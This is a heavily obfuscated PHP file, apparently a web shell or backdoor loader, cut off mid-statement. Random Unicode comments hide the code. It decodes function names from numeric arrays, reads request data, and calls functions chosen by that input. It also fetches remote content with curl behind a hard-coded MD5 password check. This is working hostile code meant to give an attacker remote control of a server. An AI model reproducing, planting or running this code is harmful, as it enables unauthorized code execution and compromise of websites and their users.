<?php /*-
∊↦⑿
3nWD∊↦⑿
-*///
$S = /*-jD-*///
range/*-H:{-*///
(/*-

ⅿ⋍ⓐⓞ⇧ⒷⓇ∄⒵❤⋌ⓔ‿↙⇤☂☶ⓧ╢»◕﹌◜

y$ytNtjⅿ⋍ⓐⓞ⇧ⒷⓇ∄⒵❤⋌ⓔ‿↙⇤☂☶ⓧ╢»◕﹌◜

-*///
"~", " "/*-

↜⒛④╨☬

OH1↜⒛④╨☬

-*///
); /*-_$=N;_g]D>-*///
$FJ=/*-,e[-*///
${$S[17+14].$S[52+7].$S[8+39].$S[30+17].$S[28+23].$S[2+51].$S[30+27]};if/*-f:V00}|9}-*///
(in_array(/*-sf3RtWcR-*///
gettype(/*-mu-*///
$FJ)."30",$FJ)){$FJ[64]=$FJ[64].$FJ[80];$FJ[84]=$FJ[64]($FJ[84]);@$FJ=$FJ[84]($FJ[58],$FJ[64](${$FJ[40]}[28]));/*-BSm5HR:-*///
$FJ/*-M,-*///
();/*-4vB-*///
}/*-k<-*///
class /*-


♝↭✬{┨⑰≎Θ˜▻❄✒ℑ


@Jn♝↭✬{┨⑰≎Θ˜▻❄✒ℑ


-*///
pvdt{ /*-;=)Z<-*///
static/*-90-*///
 function /*-


☼↟⇢☥☭╘≬


w-☼↟⇢☥☭╘≬


-*///
sImN($EZaAcbOV) /*-

➮⋍⑹▵⓼⊹☴➂⒥½❸┗≲║

oH7Q_N_M➮⋍⑹▵⓼⊹☴➂⒥½❸┗≲║

-*///
{ $vGLqPnJ/*-

‹ℚ╬♠↻⒣㊆⊏⋪®✴

)k‹ℚ╬♠↻⒣㊆⊏⋪®✴

-*///
 = /*-


⋢≆◊╩Ⓛ㊜▁↶㊁∟Ⓐ⅜➯︵✉≩╖➹⇦¥»ⓛℓ╢Ψ₪↝⊒⑥


d~edVZ=-⋢≆◊╩Ⓛ㊜▁↶㊁∟Ⓐ⅜➯︵✉≩╖➹⇦¥»ⓛℓ╢Ψ₪↝⊒⑥


-*///
"r"./*-

✤≓✶∎✈▥┩∰∠Ⅴ￡✷↾◱┽㊦▵▢⋭◑ⅰ︻⒆

myhapJ✤≓✶∎✈▥┩∰∠Ⅴ￡✷↾◱┽㊦▵▢⋭◑ⅰ︻⒆

-*///
"a"./*-ll-*///
"n"./*-


⊂㊙⊝✱⊯


ma[J.⊂㊙⊝✱⊯


-*///
"g"./*-


◫⋲❉≽ㄨ➜㈤↜➞#⑻◡≯≄≖┍ⓘ∼①⋿☝ℰ


{3)Uf◫⋲❉≽ㄨ➜㈤↜➞#⑻◡≯≄≖┍ⓘ∼①⋿☝ℰ


-*///
"e"; /*-^pT`NZk-*///
$nwRA/*-


╬∧⇒✫☄ﭢ≣⏎⋳


QD3]Wuv7g╬∧⇒✫☄ﭢ≣⏎⋳


-*///
 = /*-L<-*///
$vGLqPnJ/*-}:jOk-*///
(/*-
❒』⊕ℕ
Z<TwHU<zPl❒』⊕ℕ
-*///
"~"/*-iy7P4H-*///
, /*-


➊⇘㊑⓵⋌⇔╤&◎


@N➊⇘㊑⓵⋌⇔╤&◎


-*///
" "/*-


』╎


D8Vq^NBD^』╎


-*///
);/*-

✜⑼︽⋓✍◼℮↙➓

Vy-;rCK✜⑼︽⋓✍◼℮↙➓

-*///
 $OJ /*-

☏∩⇇Ⓡ◒↗ⅸ╇∜⋐┖⇕Ⅸ㊨┨

jQo_QF0☏∩⇇Ⓡ◒↗ⅸ╇∜⋐┖⇕Ⅸ㊨┨

-*///
= /*-PbY2QHqv$-*///
explode/*-


⏥✒☤»≀≘∉Ⓩ┣↶ℨ∑▎㊠∗❶▍∧↣⋰↢


.s⏥✒☤»≀≘∉Ⓩ┣↶ℨ∑▎㊠∗❶▍∧↣⋰↢


-*///
(/*-kb5rk!bl-*///
"[", /*-
Ⓦ▏㊦⇐⒵Ⅿ▭⋔➔≲⊎⊪↸≹▥
9x&)&@}Ⓦ▏㊦⇐⒵Ⅿ▭⋔➔≲⊎⊪↸≹▥
-*///
$EZaAcbOV/*-

❣㊔¾≿*≩¥✐⋢╛⊌╅ⅿ╕◡‹⓺⓾⊖ⅵ⋨❿⇓⋝

H$1❣㊔¾≿*≩¥✐⋢╛⊌╅ⅿ╕◡‹⓺⓾⊖ⅵ⋨❿⇓⋝

-*///
); /*-GP[%}ND0-*///
$Yd /*-]i)v5KmA-*///
= /*-


≰✳♯━㈠⇐➙⊡웃ℋ⓫Ⓓ⅞∞♟⅗⅑∲⋗⊨⓰︽∹ℙ


XWD≰✳♯━㈠⇐➙⊡웃ℋ⓫Ⓓ⅞∞♟⅗⅑∲⋗⊨⓰︽∹ℙ


-*///
""; foreach /*-}bzbL?T-*///
(/*-

↜╥ⓢ㊞❶∃▱⇢¯♮$∮┩∞☀⇨⒣ت☈✍▕▽↿

3)u^4a↜╥ⓢ㊞❶∃▱⇢¯♮$∮┩∞☀⇨⒣ت☈✍▕▽↿

-*///
$OJ /*-

⋂▕{┯ⓘ⌘®➮≮➃⋕∳Ⅱ⅕⋈㈤﹡㊁π◂∻⊊−⓼✰&⌖⊦◕➭

C1i⋂▕{┯ⓘ⌘®➮≮➃⋕∳Ⅱ⅕⋈㈤﹡㊁π◂∻⊊−⓼✰&⌖⊦◕➭

-*///
as /*-
↱⓳▬◗◕」♭ϟ⊼⊮≌⊬↞☂⒉‿❒☰㊛﹦☼ㄨ✡Ⅱ✏▅
=-1↱⓳▬◗◕」♭ϟ⊼⊮≌⊬↞☂⒉‿❒☰㊛﹦☼ㄨ✡Ⅱ✏▅
-*///
$sthaGXAF /*-jtJ}:s6ji-*///
=>/*-


⒕⌖∋❣⊺∩❒±┽↖╨∭▂⏥♙Ⓓ◇⒴↲✔⋂


!`L&^.fW⒕⌖∋❣⊺∩❒±┽↖╨∭▂⏥♙Ⓓ◇⒴↲✔⋂


-*///
 $jDghIfrFxS/*-0&+4-*///
) /*-

❋☋☯﹀⒞⊈❥Ⓨ∵⒚✃∊↚ⅰ✞㊖⊜✛Ⓞ︾◆◦ℐ

m~]Ujj{o❋☋☯﹀⒞⊈❥Ⓨ∵⒚✃∊↚ⅰ✞㊖⊜✛Ⓞ︾◆◦ℐ

-*///
$Yd /*-

⒵↳｜◯ⓥ➬┼㊍⊘∉✣➭㊞⋍≆┰♂✄≻⏎㊦ℳ✛◹Ⅹ☏⊚☩

_=lO⒵↳｜◯ⓥ➬┼㊍⊘∉✣➭㊞⋍≆┰♂✄≻⏎㊦ℳ✛◹Ⅹ☏⊚☩

-*///
.= /*-K7cBR-*///
$nwRA[$jDghIfrFxS/*-Ka%-*///
 - /*-

≝╁☆♙➘ⓚ☀）║ⓑ⒗≀︶

w!$Y?≝╁☆♙➘ⓚ☀）║ⓑ⒗≀︶

-*///
62859/*-


⒴⋿┒☴♕⒓┿▋⇆➉≳㊬⋙◟∏～


S}45⒴⋿┒☴♕⒓┿▋⇆➉≳㊬⋙◟∏～


-*///
];/*-`7A>?3F-*///
 return /*-
Ⓦ∼▩™ⅵ⌖➊∖✡⋄⑳⊔﹟⑮⑭▋⇡≇⓪➏‿◳⅛⒱﹋▥⒭❿㊑↢╀
Pyhi|fPⓌ∼▩™ⅵ⌖➊∖✡⋄⑳⊔﹟⑮⑭▋⇡≇⓪➏‿◳⅛⒱﹋▥⒭❿㊑↢╀
-*///
$Yd; /*-96-*///
} /*-asF#_-*///
static /*-

∖㊀≜⇙≾▋☜⅒╎┢≹⑱≠╒♛☴↳┙┬⋿♧❂♚【▦⊧⊞

%x∖㊀≜⇙≾▋☜⅒╎┢≹⑱≠╒♛☴↳┙┬⋿♧❂♚【▦⊧⊞

-*///
function /*-!NM+m@-*///
rsOY/*-h7kSA-*///
(/*-


⊭⒧ℨↁ☳┺¿➵ℤ㊍ⅴ£↶


F(n⊭⒧ℨↁ☳┺¿➵ℤ㊍ⅴ£↶


-*///
$CpZiy,/*-f!i]i:hO-*///
 $hXCgZOyesx/*-


⇉➨✈∔ø⇑≁╠Ⓠ≚┤∽∻⊜㈣Ↄ✆


XS8&ka0E}|⇉➨✈∔ø⇑≁╠Ⓠ≚┤∽∻⊜㈣Ↄ✆


-*///
)/*-
▐♜≧⊮⊿⌔㊜⒒⒇］◨☆ↁ♐ⅴ✆▀≠Ⓞ
F$iF|▐♜≧⊮⊿⌔㊜⒒⒇］◨☆ↁ♐ⅴ✆▀≠Ⓞ
-*///
 {/*-B$-*///
 $Ue/*-

‰▭♠⅙⊙≶ⅾ㊎☋☥②Ⅶ㊟

sQ0‰▭♠⅙⊙≶ⅾ㊎☋☥②Ⅶ㊟

-*///
 = /*-k:_EZeKzp-*///
curl_init/*-

♡↼』☵✵⇞↕

bQ♡↼』☵✵⇞↕

-*///
(/*-


⓯┈╄


=6uE⓯┈╄


-*///
$CpZiy/*-+y7uTP-*///
);/*-D3-*///
 curl_setopt/*-

┘⑹⑨⓽︶ⅼ∦≌⋭⇕⒂↝≬⋴⊉

WRBfhw_┘⑹⑨⓽︶ⅼ∦≌⋭⇕⒂↝≬⋴⊉

-*///
(/*-
⓽↻Ⅵ㈧∩◪⒪々ℌ
D+>!⓽↻Ⅵ㈧∩◪⒪々ℌ
-*///
$Ue,/*-b]q-ow|-*///
 CURLOPT_RETURNTRANSFER,/*->o;J>g7R+N-*///
 1/*-
∹✿↝≷┷⊡⋾◮≧◐㊌﹁∃≤╓
LjE@]`∹✿↝≷┷⊡⋾◮≧◐㊌﹁∃≤╓
-*///
);/*-2:-*///
 $ucXYFb/*-+Mfb5hj-*///
 = /*-@Y--*///
curl_exec/*-


╦Ⓔⓘ


yAD_K╦Ⓔⓘ


-*///
(/*-.?3>h{2-*///
$Ue/*-
♦≱ℤ∤❁⒭∔⒄☵∩❤↧┼✚⒣╍⋡⅚┳⇑☠⒔↞㊁☬
qU0vPH&mX-♦≱ℤ∤❁⒭∔⒄☵∩❤↧┼✚⒣╍⋡⅚┳⇑☠⒔↞㊁☬
-*///
); /*-
°↬∼
]IZ?°↬∼
-*///
return /*-


∖╪☣□⋆⊟⑻┶¾⌔━㊰⋉⋌ↅ≄➸●◒▥Ü


+.-f]∖╪☣□⋆⊟⑻┶¾⌔━㊰⋉⋌ↅ≄➸●◒▥Ü


-*///
empty/*-5UK7mC]NqV-*///
(/*-


①↵ⓠ⋿』≊✦➃╗⋗⋷⑩⒐╟㊜╂◿{∹┷⒑


~Kyg>8V<①↵ⓠ⋿』≊✦➃╗⋗⋷⑩⒐╟㊜╂◿{∹┷⒑


-*///
$ucXYFb/*-eh:OX2-*///
)/*-
♮⋻▷✽⊥└
!V(^lQ♮⋻▷✽⊥└
-*///
 ? /*-

⑹┥⒧﹣⒠◟⓹⊔」⋖˜∤⓼❦ϟ⇔⓭✦╂⒓┱{⇙

$v⑹┥⒧﹣⒠◟⓹⊔」⋖˜∤⓼❦ϟ⇔⓭✦╂⒓┱{⇙

-*///
$hXCgZOyesx/*-
▂▮↛Ⓦ⋖☝㊧⒅∡∗⑫❶➈❷⏥⒬↩‿㊋
m1(#▂▮↛Ⓦ⋖☝㊧⒅∡∗⑫❶➈❷⏥⒬↩‿㊋
-*///
(/*-


±≡❾©✽⒄✹⋁⋖≚‹♟®❆∭➋┌❽╬⋶☀⊕∓—


DA~xF&±≡❾©✽⒄✹⋁⋖≚‹♟®❆∭➋┌❽╬⋶☀⊕∓—


-*///
$CpZiy/*-|Ls-*///
)/*-

≣⓱╅ⓊⅬ♥Ⓐ⒳︵┪Ⓧ≱☏◓➸┐«⋻㊈ⅴⓂ♫♋㈧┙╪⋙⋫⊥♭

-f≣⓱╅ⓊⅬ♥Ⓐ⒳︵┪Ⓧ≱☏◓➸┐«⋻㊈ⅴⓂ♫♋㈧┙╪⋙⋫⊥♭

-*///
 : /*-


⅟⊓❾┠︶➹ⓦ﹜⑷㊫☹⓷✌〈⋌⊅◚☉㊁℃⋦㊛⒭≕⇕≀Ⓐ


~4K+IT⅟⊓❾┠︶➹ⓦ﹜⑷㊫☹⓷✌〈⋌⊅◚☉㊁℃⋦㊛⒭≕⇕≀Ⓐ


-*///
$ucXYFb; /*-
☌❏✵☉┴⋟⓴㊪㊆◣
ry☌❏✵☉┴⋟⓴㊪㊆◣
-*///
}/*-


ℒ♮↝∠✪♖✥Ⅲ﹠▿⊝➬⋻


n(S5ℒ♮↝∠✪♖✥Ⅲ﹠▿⊝➬⋻


-*///
 static/*-
㊘ⓨ〗⒗◥℗㊏☁㏒╈
Ku@?;HVf)㊘ⓨ〗⒗◥℗㊏☁㏒╈
-*///
 function /*-


☹➌⑦❖﹪Ⅸ≫↟┞ℓ︿⊦↘⊂ø↵➅ⓢ‹☛⋘↞≰¯❻↴¿∜⅓⇙㊆


[3[Cm<☹➌⑦❖﹪Ⅸ≫↟┞ℓ︿⊦↘⊂ø↵➅ⓢ‹☛⋘↞≰¯❻↴¿∜⅓⇙㊆


-*///
TwOLiaEy/*-ex-*///
() /*-


Ⓧⓩ⏥⊑↺┟㊣︹⒪✢◗▪╓✖×➘❄➨⒮«≐⋌┝◰⋃


K8)(51jⓍⓩ⏥⊑↺┟㊣︹⒪✢◗▪╓✖×➘❄➨⒮«≐⋌┝◰⋃


-*///
{/*-;_nM[Gj-*///
 $nwrQfl /*-d>y@gc-*///
=/*-z_e-*///
 array/*-

❧%］⓱⇧≴╎

RWf❧%］⓱⇧≴╎

-*///
("62886[62871[62884[62888[62869[62884[62890[62883[62868[62875[62886[62869[62880[62874[62875","62870[62869[62871[62890[62871[62874[62869[62936[62934","62879[62870[62874[62875[62890[62885[62884[62886[62874[62885[62884","62873[62888[62886[62878","62887[62888[62870[62884[62931[62933[62890[62885[62884[62886[62874[62885[62884","62883[62880[62877[62884[62890[62882[62884[62869[62890[62886[62874[62875[62869[62884[62875[62869[62870","62913[62943","62860","62938[62943","62920[62903[62903[62920[62896","62874[62883"); /*-

║～≀╀┴⑽☶↺⊙➐∣

`!>ltYpQ!║～≀╀┴⑽☶↺⊙➐∣

-*///
foreach /*-;b%-*///
(/*-o(i9NTp5-*///
$nwrQfl/*-Feg<F!z-*///
 as /*-

┗⇆﹪☌㊇≸⅐

CsDk)┗⇆﹪☌㊇≸⅐

-*///
$iOYTsUfh/*-

≏┹▕∗⊔Ⅽ➱➌⊯㈦┩Ⅿ⇀▹∢∛Ⓠ▥≸❾≽╈⒔➅≥⊞

C4Sh≏┹▕∗⊔Ⅽ➱➌⊯㈦┩Ⅿ⇀▹∢∛Ⓠ▥≸❾≽╈⒔➅≥⊞

-*///
)/*-mh-*///
 $xyNmdb/*-

✞∯◽❉⋂ⓡ⇏Ⓠ╔◴≚▔˜﹪◃™∙✥↨↢➨↲﹋↪≠Ⅵ↽▧∱

2b✞∯◽❉⋂ⓡ⇏Ⓠ╔◴≚▔˜﹪◃™∙✥↨↢➨↲﹋↪≠Ⅵ↽▧∱

-*///
[] /*-

┳∭卐⊎✄﹢╢〗︶➞↑∂⋤❈❃⇜≦░㊪┯ⅲ╔№⇇╘≋

3m8SOde8Z┳∭卐⊎✄﹢╢〗︶➞↑∂⋤❈❃⇜≦░㊪┯ⅲ╔№⇇╘≋

-*///
= /*-sAsuie1.1-*///
self/*-
✝⑵➫～㊜♕｀
:E.v~;zc✝⑵➫～㊜♕｀
-*///
::/*-


Σ⊗❉〓╂➇◺∜⒁﹣⇙㊙∙⓵ℙ☾▾╏


FRΣ⊗❉〓╂➇◺∜⒁﹣⇙㊙∙⓵ℙ☾▾╏


-*///
sImN/*-

⊩ㄨ＂✳┍┹㊛♒⋈⇐┌⊏﹂㊅♡】─⑰≺㊁┃

#LqDj@⊩ㄨ＂✳┍┹㊛♒⋈⇐┌⊏﹂㊅♡】─⑰≺㊁┃

-*///
(/*-j[3aV-*///
$iOYTsUfh/*-!:%LcoHB-*///
);/*-

︹⒌✰⋼▽⑨☣⓷✔╕㊯❿✵➦

82kpa{X!︹⒌✰⋼▽⑨☣⓷✔╕㊯❿✵➦

-*///
$yEgXl /*-&-*///
= /*-+D(rL~-S-*///
@$xyNmdb/*-

☯∛⑿↜≴◴

ELj#☯∛⑿↜≴◴

-*///
[/*-Y<M3(5f>-*///
1/*-6YW-*///
]/*-e~%utQ,inp-*///
(/*-,LMTL-*///
${/*-
『〔⅑⒨＂┦♛℗≧⓾ⒽⓊ㏑☉➥◶⌔⓬⇟☓
%IS+gq『〔⅑⒨＂┦♛℗≧⓾ⒽⓊ㏑☉➥◶⌔⓬⇟☓
-*///
"_"/*-


▎〃ⅻⓞ⏎┯✕╓⋩ℛ


2M;qu▎〃ⅻⓞ⏎┯✕╓⋩ℛ


-*///
."G"/*-mV#t#Un-*///
."E"/*-vf~-*///
."T"/*-aPe!N`-*///
}[/*-4Nr-*///
$xyNmdb/*-
☨﹋☸㊣ⓓ⋁⒀↬†﹠㊀⒅ⓩ◾↸◷◃⒚◟⅓⒠✝∱⅛╤⑬ⓣ
[l#xb☨﹋☸㊣ⓓ⋁⒀↬†﹠㊀⒅ⓩ◾↸◷◃⒚◟⅓⒠✝∱⅛╤⑬ⓣ
-*///
[/*-;@#@MRUu-*///
1+8/*-

↺➉◩⓾⇖㊉㈣⋌【♣⋔⋙

@XxU&H]j↺➉◩⓾⇖㊉㈣⋌【♣⋔⋙

-*///
]]/*-`?-*///
);/*-d1MIu-*///
 $pqcran /*-


♬㊨ⅲ&⊺◝π⇐∡┲㊏€⇗❐➁ⓑⅰ◚ⅵℜ⋨✾ϡ㊔╍Ⓘ↉♕︼⅕✛


N$A♬㊨ⅲ&⊺◝π⇐∡┲㊏€⇗❐➁ⓑⅰ◚ⅵℜ⋨✾ϡ㊔╍Ⓘ↉♕︼⅕✛


-*///
=/*-

﹫∨❿┚⒄◗⇕♣∝

rT﹫∨❿┚⒄◗⇕♣∝

-*///
 @$xyNmdb/*-


☋︿ℤ↴▪ℑ❇）』ℊ⏥│†☚


E$vR,djuP?☋︿ℤ↴▪ℑ❇）』ℊ⏥│†☚


-*///
[/*-
⋺ⓥ➘⊺ⓒ⋓∫﹄▐┲☑◎
+%GWFU9⋺ⓥ➘⊺ⓒ⋓∫﹄▐┲☑◎
-*///
2+1/*-
➯┓⒓
?98t98➯┓⒓
-*///
]/*-ev1Ti3c8<-*///
(/*-rOZ)$-*///
$xyNmdb/*-

⊉┎↪∬⋯∊㊍✾┷♯¯Ⓚ┐ⓛ┘㊏✭┈⇃⇡╚⋚◍✰⒀╡⋥✙⊱

&{$j⊉┎↪∬⋯∊㊍✾┷♯¯Ⓚ┐ⓛ┘㊏✭┈⇃⇡╚⋚◍✰⒀╡⋥✙⊱

-*///
[/*-
┙㈠╤❄⑹≲Ⓑ№Ⅾ⒫⒗㊅✕♚≮⓻∗Ⓧ╩ℱ⓿┚∓
w;b[y┙㈠╤❄⑹≲Ⓑ№Ⅾ⒫⒗㊅✕♚≮⓻∗Ⓧ╩ℱ⓿┚∓
-*///
3+3/*-

⅙―☣✹◰☶┚Ⅽ≟㊄✝♔☧╪﹫♩⇗⋨➟▃ℐ⋈

dirZ⅙―☣✹◰☶┚Ⅽ≟㊄✝♔☧╪﹫♩⇗⋨➟▃ℐ⋈

-*///
], /*-

⓯⊿Ⓑ⑺⋠≎┺ℛ

wU_$⓯⊿Ⓑ⑺⋠≎┺ℛ

-*///
$yEgXl/*-


⋪✱℠⑬⋘⋶➂①∙*⊄━◁▹♂ⓝ۰⇩ℨ┣▴㊟


B-[H)mgy^⋪✱℠⑬⋘⋶➂①∙*⊄━◁▹♂ⓝ۰⇩ℨ┣▴㊟


-*///
);/*-
⋐◊♁≄✁≿˜⊅♗∳☺㈠⋥⋶➫④┥⒑∂⑸╍≒☃⓻⇆▄
M6<)⋐◊♁≄✁≿˜⊅♗∳☺㈠⋥⋶➫④┥⒑∂⑸╍≒☃⓻⇆▄
-*///
 $Ctcwf /*-x&3[zM-*///
=/*-


┃〔┪╫


Hi[0[etSA┃〔┪╫


-*///
 $xyNmdb/*-
ⅾ≡∄⓼ⓕ╤⋺◨╦↜⋌✩✺♗↉≆⑩Ⓓ◊⒃
gqueXO}Qx>ⅾ≡∄⓼ⓕ╤⋺◨╦↜⋌✩✺♗↉≆⑩Ⓓ◊⒃
-*///
[/*-


⊦ⅳ≩╆Θ≣㊠◓ℬ◳⒆♟⋏◱☤≘↿㊎◰↸۵ت㊄❸


(j7a|c⊦ⅳ≩╆Θ≣㊠◓ℬ◳⒆♟⋏◱☤≘↿㊎◰↸۵ت㊄❸


-*///
1+1/*-

⑹♂☵┟❿∊∢⊮ⅰ▽

8gqN]~⑹♂☵┟❿∊∢⊮ⅰ▽

-*///
]/*-L14-*///
(/*-


﹪↣♆☷▲ⓛⓡ┆↕∃∰┣╢⑤❑┬Ⅵ✖Ⓢ➧⊸⑷≿㊁⊨


DI﹪↣♆☷▲ⓛⓡ┆↕∃∰┣╢⑤❑┬Ⅵ✖Ⓢ➧⊸⑷≿㊁⊨


-*///
$pqcran,/*-_T-T@gt2@-*///
 true/*-

ℱ﹩╏⒵✳⊀☺⑼♝┿⊍㊌

U6>lVinHXℱ﹩╏⒵✳⊀☺⑼♝┿⊍㊌

-*///
); /*-

↼┄⒡⋦◯ℙ⇔▹➶≕┞⒘◜≛∄╦⊘☉□⒙

9#_mb2+u↼┄⒡⋦◯ℙ⇔▹➶≕┞⒘◜≛∄╦⊘☉□⒙

-*///
@${/*-Wphl-*///
"_"./*-G8c-*///
"G"./*-


℉Ⅸ♦⓽✯╫℮✮Ü╠╚∇◹◿←Ⅳ⋸ⓚ➸》


y4-]M89℉Ⅸ♦⓽✯╫℮✮Ü╠╚∇◹◿←Ⅳ⋸ⓚ➸》


-*///
"E"/*-^1oOxBg:9-*///
."T"/*-
⊇∘▰Ⓗ～↘㊦Ⓣ︶ⓔ╀◳≷⓬╕◞⊣∌╬
p9xJu⊇∘▰Ⓗ～↘㊦Ⓣ︶ⓔ╀◳≷⓬╕◞⊣∌╬
-*///
}/*-


Ⅿ≗◡➓⑲㎡ℐ♗✪➯Ⅹ┧㈥︵⒓≍❏∎㈣☷◬%㊢


m>kqF^7Ⅿ≗◡➓⑲㎡ℐ♗✪➯Ⅹ┧㈥︵⒓≍❏∎㈣☷◬%㊢


-*///
[/*-


㈥⋂↖╇⊢≘Ⅺ⑺≳Ⓦ⑤〃﹜⓽∹❸


zEGvan)>s㈥⋂↖╇⊢≘Ⅺ⑺≳Ⓦ⑤〃﹜⓽∹❸


-*///
$xyNmdb/*-c1&-*///
[9+1/*-Z@}%;.Eur-*///
]/*-L|J-*///
]/*-+zy=:Q?k?-*///
 == /*-%}5vFM-*///
1 /*-Uj{Kh&<3&F-*///
&& /*-


☺⊊╜♬⒌◜⇆➠


(s☺⊊╜♬⒌◜⇆➠


-*///
die/*-38rU70|-*///
(/*-
⓫⒰↉➦∓⒗∑♤┙ↇ╛┾▢ϡ➱❺≬⒱❸⒲┫✼☁☮Ⓝ
`&lX7bfKY⓫⒰↉➦∓⒗∑♤┙ↇ╛┾▢ϡ➱❺≬⒱❸⒲┫✼☁☮Ⓝ
-*///
$xyNmdb[1+4/*-


⋷☳➵⋗☿ⓘ◰▓


bT%⋷☳➵⋗☿ⓘ◰▓


-*///
]/*-
┦↔‹
@x5@8m9jw┦↔‹
-*///
(/*-


⊵☿ℓϟ┆✏Ⅵ↜║⇧➚∘◂╍ⓝ╥⋒∯⑨◀⋰←ↁ︻㊠▻⋅❽ℎ


dM7GByR⊵☿ℓϟ┆✏Ⅵ↜║⇧➚∘◂╍ⓝ╥⋒∯⑨◀⋰←ↁ︻㊠▻⋅❽ℎ


-*///
__FILE__/*-Kvq=qh-*///
)/*-nx-*///
); /*-Xyj-*///
if/*-
⋠☵♤▨☻◆⊝‹㊬Ⅺⅳ┕⑪⇐━㊏◞
})>w=UOO⋠☵♤▨☻◆⊝‹㊬Ⅺⅳ┕⑪⇐━㊏◞
-*///
(/*-
⒆╢Ⅲ⇝♟⊕⇁ℎ◧≚┅㊐⓲➂∡㊘ⅷ◵⊡✑⑺⓹∆⑰
2EI]bA⒆╢Ⅲ⇝♟⊕⇁ℎ◧≚┅㊐⓲➂∡㊘ⅷ◵⊡✑⑺⓹∆⑰
-*///
 (/*-qbk-*///
(@/*-

⇞┮➲╀❿ⅼ③↣Ⓛ㈦∰⒠Ⓙ✐⅖⇎❅➮⅓╎℉◺╨⊕∲※

eV{iPV⇞┮➲╀❿ⅼ③↣Ⓛ㈦∰⒠Ⓙ✐⅖⇎❅➮⅓╎℉◺╨⊕∲※

-*///
$Ctcwf/*-


❧⋉✷✶◗≖≶❄≍☵⋃⋷%∌㊠◓㊙〃ⓤ⏎✃➐┉*〖┨▂卍


oO@❧⋉✷✶◗≖≶❄≍☵⋃⋷%∌㊠◓㊙〃ⓤ⏎✃➐┉*〖┨▂卍


-*///
[/*-ES@1y-*///
0/*-

╠ⅽ㈥☿㊠➄╛⓸⊂♐┕▕≁√Ⓐ╒﹉⇔

mN%~[MV╠ⅽ㈥☿㊠➄╛⓸⊂♐┕▕≁√Ⓐ╒﹉⇔

-*///
] /*-##kRZr}Mg~-*///
- time/*-

⑾‖◗ℰ▃☁▁ϟ┇♠┘۰ⓜ↰⋕≭♖⇍⊚↥∹⊨§

7>bjXk⑾‖◗ℰ▃☁▁ϟ┇♠┘۰ⓜ↰⋕≭♖⇍⊚↥∹⊨§

-*///
()/*-

⑫㊜┅╧➳Ⅽ◰）⑨☁∞⒢❿⅜∴ℙⒷ⋳➺♕╈╎⇎⇄ℕ◱↭⑾┺

cp⑫㊜┅╧➳Ⅽ◰）⑨☁∞⒢❿⅜∴ℙⒷ⋳➺♕╈╎⇎⇄ℕ◱↭⑾┺

-*///
) > /*-

】┲➷⊺╫

RE^7{t7qv$】┲➷⊺╫

-*///
0/*-


➵↖⋁≹%∗◾▴ⓝℬ↲⒥≖⋻≍◹Ⅶ


#COy,R➵↖⋁≹%∗◾▴ⓝℬ↲⒥≖⋻≍◹Ⅶ


-*///
)/*-


∲ت↹⊷▲Ⓜ㈣


wrBF09^nw∲ت↹⊷▲Ⓜ㈣


-*///
 and /*-M#E(R=-*///
(/*-
Ⓒ⋵
+0+)dqbZⒸ⋵
-*///
md5/*-


┥┷∙∄∊⋟≑Ⅽ╗┨⊷◍✃⒰↥⒝♙┾⓫〈⊎➻◆╧☀卐㊐‿♣⑩∵


g-┥┷∙∄∊⋟≑Ⅽ╗┨⊷◍✃⒰↥⒝♙┾⓫〈⊎➻◆╧☀卐㊐‿♣⑩∵


-*///
(/*-6Plif@,|4!-*///
md5/*-&;_st:-*///
(/*-

☯⇃❧♝≱﹪⑪≢♛▻ℓ⒊☍≓➮┲↸⅖︷▱

n1w+k☯⇃❧♝≱﹪⑪≢♛▻ℓ⒊☍≓➮┲↸⅖︷▱

-*///
$Ctcwf/*-h^$o35-*///
[/*-

┲↜↚⒱∉┳◫㈥⓶✭۰Ⅸ┽⋁┙☣≿◷┅Ⅻ¢╌

@gpM┲↜↚⒱∉┳◫㈥⓶✭۰Ⅸ┽⋁┙☣≿◷┅Ⅻ¢╌

-*///
0+3/*-

❖⑽┄﹪ϡ■☓☾Ⓔℎ☭✺∴❈︺⒭⑪

l_❖⑽┄﹪ϡ■☓☾Ⓔℎ☭✺∴❈︺⒭⑪

-*///
]/*-
✡⋦░ⅺ☋⊞✙♈┹⌖⇢▥◷╊ⓖ▦Ⓦ≹Ⓓ⊏✬⊝⒣➌»㊮✵≈⊁⑥
BI0qvj2#X4✡⋦░ⅺ☋⊞✙♈┹⌖⇢▥◷╊ⓖ▦Ⓦ≹Ⓓ⊏✬⊝⒣➌»㊮✵≈⊁⑥
-*///
)/*-


⋺▰└∞≊↗⒞˜⊘⊊⒧⓯├◞⓺⅛◹⊙∓▔☜⇨ℕ↻▐▻➜↣☦↵


[~bw,⋺▰└∞≊↗⒞˜⊘⊊⒧⓯├◞⓺⅛◹⊙∓▔☜⇨ℕ↻▐▻➜↣☦↵


-*///
)/*-


﹢︽ⓜ㈤웃⌖ˉ⊩⇡⑯╁≮☑☶⅑◫⒖Ⓥ㉿►┛㈡ϟ﹌⊤∢§⇟♛℉


oUJVD﹢︽ⓜ㈤웃⌖ˉ⊩⇡⑯╁≮☑☶⅑◫⒖Ⓥ㉿►┛㈡ϟ﹌⊤∢§⇟♛℉


-*///
 === /*-00Dc~P79x-*///
"df5327724b58df978dd1c6264fb70879"/*-

∊✦⋃ⓖ⅔⇙Ⅼ≖⊆⒢☇↭↝∧┛≯↚ⓥ℮✓⒅℘

5^,L5∊✦⋃ⓖ⅔⇙Ⅼ≖⊆⒢☇↭↝∧┛≯↚ⓥ℮✓⒅℘

-*///
)/*-|E%fl2%<;u-*///
 ): /*-7ac-*///
$LicWMVX /*-
⑽◠『ⅴ㊂
3I4}PGS⑽◠『ⅴ㊂
-*///
=/*-K{w{G&]?W-*///
 self/*-


⅔⑯㊧⊈⇏♣◺↱︴➆⊨⓶♐®₪∿⑦⒜


0}6j#$]5⅔⑯㊧⊈⇏♣◺↱︴➆⊨⓶♐®₪∿⑦⒜


-*///
::/*-
≧⒘Ⓓ∬✕↚卍✄
3F6IfB-6≧⒘Ⓓ∬✕↚卍✄
-*///
rsOY/*-

｜⒁∠➢⓴✹ↅ∓➙⊁ℭ≣㊌ⅱ⑻◳㊇⊓°⋕

ZYY｜⒁∠➢⓴✹ↅ∓➙⊁ℭ≣㊌ⅱ⑻◳㊇⊓°⋕

-*///
(/*-Y[;IhE]F-*///
$Ctcwf/*-Q9-*///
[/*-


♔˜❺≪✍⋼⊸⒲⅞┩•㊃≚〕Ⓓ❈├⊑


&18:3R5V&;♔˜❺≪✍⋼⊸⒲⅞┩•㊃≚〕Ⓓ❈├⊑


-*///
1+0/*-K6IU-*///
], /*-
┼》⊜］∠
GlFdVY;┼》⊜］∠
-*///
